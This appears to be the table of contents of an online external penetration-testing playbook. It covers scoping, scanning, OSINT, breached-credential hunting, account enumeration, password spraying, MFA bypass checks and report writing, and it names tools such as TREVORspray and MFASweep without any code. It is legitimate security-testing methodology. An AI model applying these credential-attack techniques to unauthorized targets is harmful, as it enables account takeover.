Keyboard shortcuts

Press or to navigate between chapters

Press S or / to search in the book

Press ? to show this help

Press Esc to hide this help

External Pentest Playbook

Rules of Engagement

Verifying the scope

Kicking OFF

Vulnerability Scanning

Nessus or OpenVAS

Information Gathering / OSINT

Hunting breached credentials

Find breached credentials and check for bad password policy patterns

Breach Parse tool A tool for parsing breached passwords

DeHashed.com

Enumerating Valid Accounts

Forgot password and see if email exists.

Analyse password policy to know if its worth to spray passwords.

Attacking Login Portals

Password Spraying

TREVORspray

Office 365 email sprayer

Burp Suite

Grab the request and perform a spider attack using the intruder tab

MFA Bypassing

MFASweep

PowerShell script that attempts to log in to various Microsoft services using a provided set of credentials and will attempt to identify if MFA is enabled.

Escalating Access

Report writing

TCM-Security-Sample-Pentest-Report